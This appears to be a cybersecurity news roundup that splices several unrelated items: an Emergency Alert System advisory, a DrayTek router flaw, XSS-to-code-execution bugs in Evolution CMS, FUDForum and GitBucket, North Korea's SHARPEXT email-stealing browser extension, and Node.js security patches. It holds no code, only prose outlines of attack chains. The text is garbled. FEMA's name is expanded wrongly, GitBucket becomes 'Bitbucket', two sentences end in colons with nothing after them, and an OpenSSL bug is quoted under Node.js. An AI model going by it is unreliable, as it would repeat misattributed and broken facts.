The advisory came on August 1 from DHS' Federal Emergency Alert Agency (FEMA). Cybersecurity experts Ken Pyle found out about the vulnerabilities.
FEMA said the EAS national test in 2021 was very similar to regular monthly tests typically originated by state authorities.
During the test, radios and televisions across the country interrupted normal programming to play the EAS test message in English or Spanish.
"The EAS national test in 2021 was very similar to regular monthly tests typically originated by state authorities. During the test, radios and televisions across the country interrupted normal programming to play the EAS test message in English or Spanish," reports FEMA.
EAS is a U.S. national public warning system that allows state authorities to send out information in less than 10 minutes if there's an emergency. These warnings can interrupt TV and radio to show emergency alert information.
Information about the bugs has not been disclosed to prevent threat actors from exploiting them, but we can expect the details publicly soon as a proof-of-concept at the DEF CON conference going to take place in Las Vegas next week.
Basically, the flaws are public knowledge and will be shown to a large audience in the following weeks.
To control the vulnerability, users are advised to update the EAS devices to the latest software versions, use a firewall to secure them, and keep an eye on audit and review logs for signs of any suspicious access (unauthorised).
"The testing process is designed to evaluate the effectiveness of the IPAWS Open Platform for Emergency Networks and assess the operational readiness of the infrastructure for distribution of a national message and determine whether technological improvements are needed," reports FEMA.
The widely used series of DrayTek Vigor routers for small businesses have been found to have a significant, pre-authenticated remote code execution (RCE) vulnerability. Researchers caution that if it is exploited, it may enable total device takeover as well as access to a larger network.
Researchers from PT Swarm found the security bugs in the web development applications Evolution CMS, FUDForum, and Gitbucket.
A primitive XSS attack lets the threat actor's JavaScript code run in the victim user's web browser, which opens the door for cookie theft, redirects to a phishing site, and a lot more.
Cross-Site Scripting (XSS) is one of the most widely faced attacks in web apps. If a threat actor deploys a javascript code into the app output, not only steals cookies, but it also leads to complete compromise of the systems sometime. In this blog post, we'll try to understand how XSS-driven remote code execution is achieved through examples of Evolution CMS, FUDForum, and Gitbucket.
The first bug, Evolution CMS V3.1.8, allows a hacker to launch a reflected XSS attack in various locations in the admin section. Aleksey Solovev says in case of a successful attack on an administrator authorized in the system, the index.php file will be overwritten with the code that the attacker placed in the payload.
The second vulnerability, discovered in FUDForum v3.1.1, can possibly let a hacker launch a stored XSS attack. Aleksey Solovev says FUDforum is a super fast and scalable discussion forum. It is highly customizable and supports unlimited members, forums, posts, topics, polls, and attachments.
The FUDforum admin panel has a file manager that allows you to upload files to the server, including files with the PHP extension. An attacker can use stored XSS to upload a PHP file that can execute any command on the server.
In the last vulnerability, Bitbucket v4.37.1, a security bug was found that can allow an attacker to launch a stored XSS attack in various locations. Aleksey Solovev says having a stored XSS attack can try to exploit it in order to execute code on the server. The admin panel has tools for performing SQL queries – Database viewer.
GitBucket uses H2 Database Engine by default. For this database, there is a publicly available exploit to achieve a Remote Code Execution. So, all an attacker needs to do is create a PoC code based on this exploit, upload it to the repository and use it during an attack:
Threat actor SharpTongue, which is linked to North Korea, was found using a malicious extension on Chromium-based browsers to keep surveillance on victims' Gmail and AOL email accounts. Experts from cybersecurity agency Volexity found the hackers as SharpTongue, but its activities coincide with one of the Kimsuky APT groups.
The SharpTongue's toolset was covered by Huntress in 2021 in a published report, but in September 2021, Volexity started noticing usage of earlier unreported Malware strain, in the past year. Volexity has looked over various cybersecurity cases which involve SharpTongue and in most of the incidents, hackers use a malicious Microsoft Edge or Google Chrome extension known as "SHARPEXT."
Contrary to other extensions in use by the Kimsuky APT group, SHARPEXT doesn't steal passwords or usernames, however, it accesses the target's webmail account while they're browsing it. The present version of the extension backs three browsers and is capable of stealing the contents of e-mails from AOL webmail and Gmail accounts.
The report analysis says that SHARPEXT is a malicious browser extension deployed by SharpTongue following the successful compromise of a target system. In the first versions of SHARPEXT investigated by Volexity, the malware only supported Google Chrome.
The current variant 3.0 supports three browsers:
The attack chain begins with hackers manually extracting files required to install extensions from the malicious workstation. After a breach of the victim's Windows system, the hackers change the web browser's Preferences and Secure Preferences.
After that, hackers manually deploy SHARPEXT via a VBS script and enable the DevTools panel in the active tab to keep surveillance on the email contents and steal file attachments from the target's mail account. This is done via PowerShell script, hackers also conceal warning messages running developer mode extensions.
Security Affairs report, "experts pointed out that this is the first time the threat actor used malicious browser extensions as part of the post-exploitation phase. Stealing email data from a user’s already-logged-in session makes this attack stealthy and hard to be detected by the email provider. The researchers shared the YARA rules to detect these attacks and Indicators of Compromise (IOCs) for this threat."
Node.js maintainers released multiple patches for flaws in the JavaScript runtime environment that can cause HTTP request smuggling and arbitrary code execution, among some other attacks. An advisory mentions the information about the seven patched bugs, it includes three seperate HTTP Request Smuggling vulnerabilities.
The three flaws- a flawed parsing of transfer-encoding bug, tracked as CVE-2022-32213, an errored delimiting of header fields issue, tracked as CVE-2022-32214, and an improper parsing of multi-line transfer encoding exploit, tracked as CVE-2022-32215, can all in the end lead towards HTTP request smuggling.
The Daily Swig says "the moderate-severity implementation bug (CVE-2022-2097) could cause encryption to fail in some circumstances. AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimized implementation will not encrypt the entirety of the data, which could reveal sixteen bytes of data that was pre-existing in the memory that wasn’t written."
The three bugs were rated as "medium" severity, they affect all three variants of the 18.x, 16.x, and 14.x releases lines. llhttp v6.0.7 and llhttp v2.1.5 includes the patches that were updated inside Node.js.
The advisory also includes information about a DNS rebinding flaw in --inspect through improper IP addresses. Categorised as "high" severity, the bug (CVE-2022-32212) can permit arbitrary code execution, warns the advisory.
“The IsAllowedHost check can easily be bypassed because IsIPAddress does not properly check if an IP address is invalid or not.When an invalid IPv4 address is provided browsers will make DNS requests to the DNS server, providing a vector for an attacker-controlled DNS server or a MitM who can spoof DNS responses to perform a rebinding attack and hence connect to the WebSocket debugger, allowing for arbitrary code execution. This is a bypass of CVE-2021-22884,” says the advisory.
The flaw affects all variants of the 18.x, 16.x, and 14.x releases lines.